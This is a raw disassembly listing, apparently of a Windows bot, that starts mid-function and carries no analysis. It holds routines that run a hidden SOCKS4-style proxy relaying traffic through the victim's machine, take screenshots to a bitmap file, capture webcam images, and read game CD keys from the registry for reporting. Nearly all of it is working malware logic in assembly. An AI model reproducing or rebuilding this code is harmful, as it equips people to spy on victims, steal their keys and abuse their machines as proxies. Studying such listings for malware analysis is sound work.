jl short loc_407FAF
pop esi
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F51 proc near ; DATA XREF: sub_40F6F1+5F90�o
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_4D0 = byte ptr -4D0h
var_4CF = byte ptr -4CFh
var_4CE = word ptr -4CEh
var_4CC = dword ptr -4CCh
var_4C8 = byte ptr -4C8h
var_2D4 = byte ptr -2D4h
var_D4 = dword ptr -0D4h
var_D0 = byte ptr -0D0h
var_C8 = byte ptr -0C8h
var_44 = byte ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 10h
mov esi, eax
pop ebx
lea edi, [ebp+var_D4]
push 2Ch
mov [ebp+var_4], ebx
pop ecx
rep movsd
push 1
xor esi, esi
pop edi
mov [eax+0A8h], edi
push ebx
lea eax, [ebp+var_14]
push esi
push eax
call sub_417430
add esp, 0Ch
mov word ptr [ebp+var_14], 2
push [ebp+var_40]
call dword_4413B8 ; ntohs
push 6
push edi
push 2
mov word ptr [ebp+var_14+2], ax
mov [ebp+var_10], esi
call dword_441438 ; socket
mov edi, eax
loc_407FAF: ; CODE XREF: ___:00407F4E�j
mov eax, [ebp+var_3C]
imul eax, 234h
push ebx
mov dword_446E1C[eax], edi
lea eax, [ebp+var_14]
push eax
push edi
call dword_4413E4 ; bind
test eax, eax
jnz loc_4080F3
push 0Ah
push edi
call dword_4413E0 ; listen
test eax, eax
jnz loc_4080F3
push [ebp+var_40]
push [ebp+var_D4]
call sub_40AFAB
pop ecx
push eax
lea eax, [ebp+var_2D4]
push offset unk_4296E0
push eax
call sub_4173AC
add esp, 10h
cmp [ebp+var_30], esi
jnz short loc_40802C
push esi
lea eax, [ebp+var_2D4]
push [ebp+var_34]
push eax
lea eax, [ebp+var_D0]
push eax
push [ebp+var_D4]
call sub_40DC10
add esp, 14h
loc_40802C: ; CODE XREF: sub_407F51+B9�j
; sub_407F51+172�j ...
lea eax, [ebp+var_2D4]
push eax
call sub_40C4F7
pop ecx
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call dword_44144C ; accept
push [ebp+var_3C]
mov ebx, eax
movzx eax, [ebp+var_22]
push eax
mov [ebp+var_28], esi
push [ebp+var_20]
call dword_441444 ; inet_ntoa
push eax
lea eax, [ebp+var_2D4]
push offset unk_42968C
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2D4]
push 11h
push eax
call sub_416E58
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov dword_446E14[eax], ecx
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_D4]
push esi
push eax
push offset loc_408156
push esi
push esi
nop
call near ptr 7C810637h
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_446E24[ecx], eax
jz short loc_4080D3
loc_4080C0: ; CODE XREF: sub_407F51+180�j
cmp [ebp+var_28], esi
jnz loc_40802C
push 5
nop
call near ptr 7C802442h
jmp short loc_4080C0
; ---------------------------------------------------------------------------
loc_4080D3: ; CODE XREF: sub_407F51+16D�j
nop
call near ptr 7C910331h
push eax
lea eax, [ebp+var_2D4]
push offset unk_429644
push eax
call sub_4173AC
add esp, 0Ch
jmp loc_40802C
; ---------------------------------------------------------------------------
loc_4080F3: ; CODE XREF: sub_407F51+7B�j
; sub_407F51+8C�j
push edi
call dword_441450 ; closesocket
push [ebp+var_40]
lea eax, [ebp+var_2D4]
push offset unk_429604
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_408136
push esi
lea eax, [ebp+var_2D4]
push [ebp+var_34]
push eax
lea eax, [ebp+var_D0]
push eax
push [ebp+var_D4]
call sub_40DC10
add esp, 14h
loc_408136: ; CODE XREF: sub_407F51+1C3�j
lea eax, [ebp+var_2D4]
push eax
call sub_40C4F7
push [ebp+var_3C]
call sub_417174
pop ecx
pop ecx
push esi
nop
call near ptr 7C80C058h
pop edi
pop esi
pop ebx
loc_408156: ; DATA XREF: sub_407F51+14F�o
push ebp
mov ebp, esp
sub esp, 5D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 2Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
mov esi, [ebp+var_2C]
push 1
mov [ebp+arg_0], esi
imul esi, 234h
pop edi
lea esi, dword_446E1C[esi]
mov [eax+0ACh], edi
xor ebx, ebx
mov eax, [esi]
mov [ebp+var_8], 5
mov [ebp+var_5D0], eax
lea eax, [ebp+var_8]
push eax
push ebx
lea eax, [ebp+var_5D4]
push ebx
push eax
push ebx
mov [ebp+var_4], ebx
mov [ebp+var_5D4], edi
call dword_4413A0 ; select
test eax, eax
jnz short loc_4081D7
push dword ptr [esi]
call dword_441450 ; closesocket
push [ebp+arg_0]
call sub_417174
pop ecx
push ebx
nop
call near ptr 7C80C058h
loc_4081D7: ; CODE XREF: sub_407F51+26C�j
push ebx
lea eax, [ebp+var_4D0]
push 408h
push eax
push dword ptr [esi]
call dword_4413D0 ; recv
test eax, eax
jg short loc_408208
push dword ptr [esi]
call dword_441450 ; closesocket
push [ebp+arg_0]
call sub_417174
pop ecx
push ebx
nop
call near ptr 7C80C058h
loc_408208: ; CODE XREF: sub_407F51+29D�j
cmp [ebp+var_4D0], 4
jnz loc_408402
cmp [ebp+var_4CF], 1
jnz loc_408402
cmp [ebp+var_44], bl
jz short loc_40829E
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_40829E
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
push offset unk_4297B4
call sub_40C56B
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Dh
call sub_417430
add esp, 18h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_441408 ; send
push dword ptr [esi]
call dword_441450 ; closesocket
push [ebp+arg_0]
call sub_417174
pop ecx
push ebx
nop
call near ptr 7C80C058h
loc_40829E: ; CODE XREF: sub_407F51+2D4�j
; sub_407F51+2EA�j
push 10h
lea eax, [ebp+var_18]
push ebx
push eax
call sub_417430
mov ax, [ebp+var_4CE]
add esp, 0Ch
mov [ebp+var_16], ax
mov eax, [ebp+var_4CC]
push 6
push edi
push 2
mov [ebp+var_18], 2
mov [ebp+var_14], eax
call dword_441438 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_408336
call dword_44134C ; WSAGetLastError
push eax
push offset unk_429768
call sub_40C56B
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call sub_417430
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_441408 ; send
push dword ptr [esi]
call dword_441450 ; closesocket
push [ebp+arg_0]
call sub_417174
pop ecx
push ebx
nop
call near ptr 7C80C058h
loc_408336: ; CODE XREF: sub_407F51+386�j
lea eax, [ebp+var_18]
push 10h
push eax
push edi
call dword_441360 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4083A5
call dword_44134C ; WSAGetLastError
push eax
push offset unk_429718
call sub_40C56B
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call sub_417430
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_441408 ; send
push dword ptr [esi]
call dword_441450 ; closesocket
push [ebp+arg_0]
call sub_417174
pop ecx
push ebx
nop
call near ptr 7C80C058h
loc_4083A5: ; CODE XREF: sub_407F51+3F5�j
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Ah
call sub_417430
add esp, 0Ch
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_441408 ; send
push dword ptr [esi]
push edi
call sub_40841A
pop ecx
pop ecx
push edi
call dword_441450 ; closesocket
push dword ptr [esi]
call dword_441450 ; closesocket
push [ebp+arg_0]
call sub_417174
pop ecx
push ebx
nop
call near ptr 7C80C058h
loc_408402: ; CODE XREF: sub_407F51+2BE�j
; sub_407F51+2CB�j
push dword ptr [esi]
call dword_441450 ; closesocket
push [ebp+arg_0]
call sub_417174
pop ecx
push ebx
nop
call near ptr 7C80C058h
sub_407F51 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40841A proc near ; CODE XREF: sub_407F51+48B�p
var_504 = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
mov esi, 400h
loc_408430: ; CODE XREF: sub_40841A+C5�j
; sub_40841A+F5�j
mov [ebp+var_100], ebx
mov [ebp+var_104], 1
xor ecx, ecx
lea eax, [ebp+var_100]
loc_408448: ; CODE XREF: sub_40841A+3C�j
mov edx, [ebp+arg_0]
cmp [eax], edx
jz short loc_408458
inc ecx
add eax, 4
cmp ecx, 1
jb short loc_408448
loc_408458: ; CODE XREF: sub_40841A+33�j
cmp ecx, 1
jnz short loc_40846D
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_40846D: ; CODE XREF: sub_40841A+41�j
push esi
lea eax, [ebp+var_504]
push edi
push eax
call sub_417430
add esp, 0Ch
lea eax, [ebp+var_104]
push edi
push edi
push edi
push eax
push edi
call dword_4413A0 ; select
lea eax, [ebp+var_104]
push eax
push ebx
call dword_4412B0 ; __WSAFDIsSet
test eax, eax
jz short loc_4084CD
push edi
lea eax, [ebp+var_504]
push esi
push eax
push ebx
call dword_4413D0 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_408515
push edi
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_441408 ; send
cmp eax, 0FFFFFFFFh
jz short loc_408515
loc_4084CD: ; CODE XREF: sub_40841A+85�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call dword_4412B0 ; __WSAFDIsSet
test eax, eax
jz loc_408430
push edi
lea eax, [ebp+var_504]
push esi
push eax
push [ebp+arg_0]
call dword_4413D0 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_408515
push edi
push eax
lea eax, [ebp+var_504]
push eax
push ebx
call dword_441408 ; send
cmp eax, 0FFFFFFFFh
jnz loc_408430
loc_408515: ; CODE XREF: sub_40841A+9A�j
; sub_40841A+B1�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40841A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40851A proc near ; CODE XREF: sub_40F6F1+46A2�p
var_484 = byte ptr -484h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 484h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push offset aDisplay ; "DISPLAY"
call dword_4413A4 ; CreateDCA
mov edi, eax
cmp edi, esi
mov [ebp+var_20], edi
jz loc_40874E
push 8
push edi
call dword_4413C0 ; GetDeviceCaps
push 0Ah
push edi
mov [ebp+var_8], eax
call dword_4413C0 ; GetDeviceCaps
push 0Ch
push edi
mov [ebp+var_C], eax
call dword_4413C0 ; GetDeviceCaps
cmp eax, 8
mov [ebp+var_10], eax
ja short loc_40857C
push 18h
push edi
call dword_4413C0 ; GetDeviceCaps
mov ebx, 100h
jmp short loc_40857E
; ---------------------------------------------------------------------------
loc_40857C: ; CODE XREF: sub_40851A+50�j
xor ebx, ebx
loc_40857E: ; CODE XREF: sub_40851A+60�j
push edi
call dword_441404 ; CreateCompatibleDC
cmp eax, esi
mov [ebp+var_4], eax
jz loc_408733
mov eax, [ebp+var_8]
push esi
mov [ebp+var_80], eax
mov eax, [ebp+var_C]
mov [ebp+var_7C], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+var_76], ax
lea eax, [ebp+var_18]
push esi
push eax
lea eax, [ebp+var_84]
push 1
push eax
push edi
mov [ebp+var_84], 28h
mov [ebp+var_78], 1
mov [ebp+var_74], esi
mov [ebp+var_70], esi
mov [ebp+var_6C], esi
mov [ebp+var_68], esi
mov [ebp+var_64], ebx
mov [ebp+var_60], ebx
call dword_4413FC ; CreateDIBSection
cmp eax, esi
mov [ebp+var_1C], eax
jz loc_40873E
push eax
push [ebp+var_4]
call dword_441294 ; SelectObject
cmp eax, esi
jz loc_40873E
cmp eax, 0FFFFFFFFh
jz loc_40873E
push 0CC0020h
push esi
push esi
push edi
push [ebp+var_C]
push [ebp+var_8]
push esi
push esi
push [ebp+var_4]
call dword_441400 ; BitBlt
test eax, eax
jz loc_40873E
cmp ebx, esi
jz short loc_40863B
lea eax, [ebp+var_484]
push eax
push ebx
push esi
push [ebp+var_4]
call dword_4412E8 ; GetDIBColorTable
mov ebx, eax
loc_40863B: ; CODE XREF: sub_40851A+10B�j
mov edi, [ebp+var_10]
mov ecx, [ebp+var_8]
imul edi, [ebp+var_C]
imul edi, ecx
mov eax, ebx
push esi
shr edi, 3
shl eax, 2
mov [ebp+var_8], eax
push 80h
lea edx, [eax+edi+36h]
add eax, 36h
push 2
mov [ebp+var_26], eax
mov eax, [ebp+var_C]
push esi
push esi
push 40000000h
push [ebp+arg_0]
mov [ebp+var_50], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+var_30], 4D42h
mov [ebp+var_2E], edx
mov [ebp+var_2A], si
mov [ebp+var_28], si
mov [ebp+var_58], 28h
mov [ebp+var_54], ecx
mov [ebp+var_4C], 1
mov [ebp+var_4A], ax
mov [ebp+var_48], esi
mov [ebp+var_44], esi
mov [ebp+var_40], esi
mov [ebp+var_3C], esi
mov [ebp+var_38], ebx
mov [ebp+var_34], esi
nop
call near ptr 7C801A24h
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_40871E
lea ecx, [ebp+var_14]
push esi
push ecx
lea ecx, [ebp+var_30]
push 0Eh
push ecx
push eax
nop
call near ptr 7C810D87h
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_58]
push 28h
push eax
push [ebp+arg_0]
nop
call near ptr 7C810D87h
cmp ebx, esi
jz short loc_408700
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_484]
push [ebp+var_8]
push eax
push [ebp+arg_0]
nop
call near ptr 7C810D87h
loc_408700: ; CODE XREF: sub_40851A+1CC�j
lea eax, [ebp+var_14]
push esi
push eax
push edi
push [ebp+var_18]
push [ebp+arg_0]
nop
call near ptr 7C810D87h
push [ebp+arg_0]
nop
call near ptr 7C809B47h
push 1
pop esi
loc_40871E: ; CODE XREF: sub_40851A+1A2�j
push [ebp+var_1C]
call dword_44131C ; DeleteObject
push [ebp+var_4]
call dword_441280 ; DeleteDC
mov edi, [ebp+var_20]
loc_408733: ; CODE XREF: sub_40851A+70�j
push edi
call dword_441280 ; DeleteDC
mov eax, esi
jmp short loc_408750
; ---------------------------------------------------------------------------
loc_40873E: ; CODE XREF: sub_40851A+C7�j
; sub_40851A+D9�j ...
push edi
call dword_441280 ; DeleteDC
push [ebp+var_4]
call dword_441280 ; DeleteDC
loc_40874E: ; CODE XREF: sub_40851A+23�j
xor eax, eax
loc_408750: ; CODE XREF: sub_40851A+222�j
pop edi
pop esi
pop ebx
leave
retn
sub_40851A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408755 proc near ; CODE XREF: sub_40F6F1+47DE�p
var_34 = byte ptr -34h
var_20 = dword ptr -20h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
push esi
push dword_43FE50
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow ; "Window"
call dword_441310
mov edi, eax
cmp edi, ebx
mov [ebp+var_4], edi
jnz short loc_408793
mov eax, esi
jmp loc_408949
; ---------------------------------------------------------------------------
loc_408793: ; CODE XREF: sub_408755+35�j
push edi
call dword_441358 ; IsWindow
test eax, eax
jz short loc_4087B0
push ebx
push [ebp+arg_4]
push 40Ah
push edi
call dword_441414 ; SendMessageA
jmp short loc_4087B2
; ---------------------------------------------------------------------------
loc_4087B0: ; CODE XREF: sub_408755+47�j
xor eax, eax
loc_4087B2: ; CODE XREF: sub_408755+59�j
cmp eax, ebx
jnz short loc_4087BD
loc_4087B6: ; CODE XREF: sub_408755+88�j
; sub_408755+BC�j
mov ebx, esi
jmp loc_40893E
; ---------------------------------------------------------------------------
loc_4087BD: ; CODE XREF: sub_408755+5F�j
push edi
call dword_441358 ; IsWindow
test eax, eax
jz short loc_4087DA
lea eax, [ebp+var_34]
push eax
push 2Ch
push 40Eh
push edi
call dword_441414 ; SendMessageA
loc_4087DA: ; CODE XREF: sub_408755+71�j
cmp [ebp+var_20], ebx
jz short loc_4087B6
push edi
call dword_441358 ; IsWindow
test eax, eax
mov edi, 42Ch
jz short loc_408800
push ebx
push ebx
push edi
push [ebp+var_4]
call dword_441414 ; SendMessageA
mov [ebp+arg_4], eax
jmp short loc_408803
; ---------------------------------------------------------------------------
loc_408800: ; CODE XREF: sub_408755+98�j
mov [ebp+arg_4], ebx
loc_408803: ; CODE XREF: sub_408755+A9�j
push [ebp+arg_4]
call sub_417BEE
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jz short loc_4087B6
push [ebp+arg_4]
call sub_417BEE
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_40882A
push 1
pop ebx
jmp loc_40893E
; ---------------------------------------------------------------------------
loc_40882A: ; CODE XREF: sub_408755+CB�j
push [ebp+var_4]
call dword_441358 ; IsWindow
test eax, eax
jz short loc_408847
push [ebp+var_8]
push [ebp+arg_4]
push edi
push [ebp+var_4]
call dword_441414 ; SendMessageA
loc_408847: ; CODE XREF: sub_408755+E0�j
push [ebp+arg_4]
push [ebp+var_8]
push esi
call sub_417490
mov ecx, [ebp+arg_8]
add esp, 0Ch
cmp ecx, ebx
jg short loc_408862
mov ecx, 280h
loc_408862: ; CODE XREF: sub_408755+106�j
mov eax, [ebp+arg_C]
cmp eax, ebx
jg short loc_40886E
mov eax, 1E0h
loc_40886E: ; CODE XREF: sub_408755+112�j
push [ebp+var_4]
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call dword_441358 ; IsWindow
test eax, eax
mov edi, 42Dh
jz short loc_4088B8
push esi
push [ebp+arg_4]
push edi
push [ebp+var_4]
call dword_441414 ; SendMessageA
loc_4088B8: ; CODE XREF: sub_408755+153�j
push [ebp+var_4]
call dword_441358 ; IsWindow
test eax, eax
jz short loc_4088D5
push ebx
push ebx
push 43Dh
push [ebp+var_4]
call dword_441414 ; SendMessageA
loc_4088D5: ; CODE XREF: sub_408755+16E�j
push [ebp+var_4]
call dword_441358 ; IsWindow
test eax, eax
jz short loc_4088F4
push [ebp+arg_0]
push ebx
push 419h
push [ebp+var_4]
call dword_441414 ; SendMessageA
loc_4088F4: ; CODE XREF: sub_408755+18B�j
push [ebp+var_4]
call dword_441358 ; IsWindow
test eax, eax
jz short loc_408911
push [ebp+var_8]
push [ebp+arg_4]
push edi
push [ebp+var_4]
call dword_441414 ; SendMessageA
loc_408911: ; CODE XREF: sub_408755+1AA�j
push [ebp+var_8]
call sub_417C62
push esi
call sub_417C62
pop ecx
pop ecx
push [ebp+var_4]
call dword_441358 ; IsWindow
test eax, eax
jz short loc_40893E
push ebx
push ebx
push 40Bh
push [ebp+var_4]
call dword_441414 ; SendMessageA
loc_40893E: ; CODE XREF: sub_408755+63�j
; sub_408755+D0�j ...
push [ebp+var_4]
call dword_441468 ; DestroyWindow
mov eax, ebx
loc_408949: ; CODE XREF: sub_408755+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_408755 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40894E proc near ; CODE XREF: sub_40F6F1+4897�p
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 90h
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
push esi
push dword_43FE50
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow ; "Window"
call dword_441310
mov edi, eax
cmp edi, ebx
jnz short loc_40898C
mov eax, esi
jmp loc_408B88
; ---------------------------------------------------------------------------
loc_40898C: ; CODE XREF: sub_40894E+35�j
push edi
call dword_441358 ; IsWindow
test eax, eax
jz short loc_4089A9
push ebx
push [ebp+arg_4]
push 40Ah
push edi
call dword_441414 ; SendMessageA
jmp short loc_4089AB
; ---------------------------------------------------------------------------
loc_4089A9: ; CODE XREF: sub_40894E+47�j
xor eax, eax
loc_4089AB: ; CODE XREF: sub_40894E+59�j
cmp eax, ebx
jnz short loc_4089B6
loc_4089AF: ; CODE XREF: sub_40894E+8B�j
; sub_40894E+BC�j
mov ebx, esi
jmp loc_408B7F
; ---------------------------------------------------------------------------
loc_4089B6: ; CODE XREF: sub_40894E+5F�j
push edi
call dword_441358 ; IsWindow
test eax, eax
jz short loc_4089D6
lea eax, [ebp+var_90]
push eax
push 2Ch
push 40Eh
push edi
call dword_441414 ; SendMessageA
loc_4089D6: ; CODE XREF: sub_40894E+71�j
cmp [ebp+var_7C], ebx
jz short loc_4089AF
push edi
call dword_441358 ; IsWindow
test eax, eax
jz short loc_4089F9
push ebx
push ebx
push 42Ch
push edi
call dword_441414 ; SendMessageA
mov [ebp+arg_4], eax
jmp short loc_4089FC
; ---------------------------------------------------------------------------
loc_4089F9: ; CODE XREF: sub_40894E+96�j
mov [ebp+arg_4], ebx
loc_4089FC: ; CODE XREF: sub_40894E+A9�j
push [ebp+arg_4]
call sub_417BEE
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jz short loc_4089AF
push [ebp+arg_4]
call sub_417BEE
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_408A23
push 1
pop ebx
jmp loc_408B7F
; ---------------------------------------------------------------------------
loc_408A23: ; CODE XREF: sub_40894E+CB�j
push edi
call dword_441358 ; IsWindow
test eax, eax
jz short loc_408A40
push [ebp+var_4]
push [ebp+arg_4]
push 42Ch
push edi
call dword_441414 ; SendMessageA
loc_408A40: ; CODE XREF: sub_40894E+DE�j
push [ebp+arg_4]
push [ebp+var_4]
push esi
call sub_417490
mov ecx, [ebp+arg_C]
add esp, 0Ch
cmp ecx, ebx
jg short loc_408A5B
mov ecx, 0A0h
loc_408A5B: ; CODE XREF: sub_40894E+106�j
mov eax, [ebp+arg_10]
cmp eax, ebx
jg short loc_408A65
push 78h
pop eax
loc_408A65: ; CODE XREF: sub_40894E+112�j
push edi
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call dword_441358 ; IsWindow
test eax, eax
jz short loc_408AAA
push esi
push [ebp+arg_4]
push 42Dh
push edi
call dword_441414 ; SendMessageA
loc_408AAA: ; CODE XREF: sub_40894E+14A�j
push edi
call dword_441358 ; IsWindow
test eax, eax
jz short loc_408AC7
lea eax, [ebp+var_64]
push eax
push 60h
push 441h
push edi
call dword_441414 ; SendMessageA
loc_408AC7: ; CODE XREF: sub_40894E+165�j
push edi
mov [ebp+var_60], ebx
mov [ebp+var_3C], ebx
mov [ebp+var_38], ebx
mov [ebp+var_34], ebx
mov [ebp+var_30], 1
mov [ebp+var_2C], 5
mov [ebp+var_64], 1046Ah
call dword_441358 ; IsWindow
test eax, eax
jz short loc_408B05
lea eax, [ebp+var_64]
push eax
push 60h
push 440h
push edi
call dword_441414 ; SendMessageA
loc_408B05: ; CODE XREF: sub_40894E+1A3�j
push edi
call dword_441358 ; IsWindow
test eax, eax
jz short loc_408B20
push [ebp+arg_0]
push ebx
push 414h
push edi
call dword_441414 ; SendMessageA
loc_408B20: ; CODE XREF: sub_40894E+1C0�j
push edi
call dword_441358 ; IsWindow
test eax, eax
jz short loc_408B39
push ebx
push ebx
push 43Eh
push edi
call dword_441414 ; SendMessageA
loc_408B39: ; CODE XREF: sub_40894E+1DB�j
push edi
call dword_441358 ; IsWindow
test eax, eax
jz short loc_408B56
push [ebp+var_4]
push [ebp+arg_4]
push 42Dh
push edi
call dword_441414 ; SendMessageA
loc_408B56: ; CODE XREF: sub_40894E+1F4�j
push [ebp+var_4]
call sub_417C62
push esi
call sub_417C62
pop ecx
pop ecx
push edi
call dword_441358 ; IsWindow
test eax, eax
jz short loc_408B7F
push ebx
push ebx
push 40Bh
push edi
call dword_441414 ; SendMessageA
loc_408B7F: ; CODE XREF: sub_40894E+63�j
; sub_40894E+D0�j ...
push edi
call dword_441468 ; DestroyWindow
mov eax, ebx
loc_408B88: ; CODE XREF: sub_40894E+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_40894E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408B8D proc near ; CODE XREF: sub_40F6F1+59B4�p
var_3F4 = byte ptr -3F4h
var_2F0 = byte ptr -2F0h
var_F0 = byte ptr -0F0h
var_70 = byte ptr -70h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 3F4h
push ebx
xor ebx, ebx
cmp off_429814, ebx
mov [ebp+var_C], 80h
jz loc_408D3F
push esi
push edi
mov eax, offset off_429814
mov esi, offset dword_429820
mov edi, offset aSCdKeyS_ ; "%s CD Key: (%s)."
loc_408BBD: ; CODE XREF: sub_408B8D+1AA�j
lea ecx, [ebp+var_4]
push ecx
push 20019h
push ebx
push dword ptr [eax]
push dword ptr [esi-10h]
call dword_441428 ; RegOpenKeyExA
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_F0]
push eax
push ebx
push ebx
push dword ptr [esi-8]
push [ebp+var_4]
call dword_4412C4 ; RegQueryValueExA
test eax, eax
jnz loc_408D25
mov eax, [esi]
cmp eax, ebx
jz loc_408CE9
push eax
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_3F4]
push offset aSS_3 ; "%s\\%s"
push eax
call sub_4173AC
lea eax, [ebp+var_3F4]
push offset aR ; "r"
push eax
call sub_41823A
add esp, 18h
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_408D25
push eax
loc_408C36: ; CODE XREF: sub_408B8D+D4�j
lea eax, [ebp+var_70]
push 64h
push eax
call sub_4186EC
add esp, 0Ch
test eax, eax
jz loc_408CDE
push dword ptr [esi+4]
lea eax, [ebp+var_70]
push eax
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_408C63
push [ebp+var_8]
jmp short loc_408C36
; ---------------------------------------------------------------------------
loc_408C63: ; CODE XREF: sub_408B8D+CF�j
push 3Dh
push dword ptr [esi+4]
call sub_418630
pop ecx
test eax, eax
pop ecx
jz short loc_408CA2
lea eax, [ebp+var_70]
push offset asc_42AA18 ; "="
push eax
call sub_41824D
push offset asc_42AA18 ; "="
push ebx
call sub_41824D
push eax
lea eax, [ebp+var_2F0]
push dword ptr [esi-4]
push edi
push eax
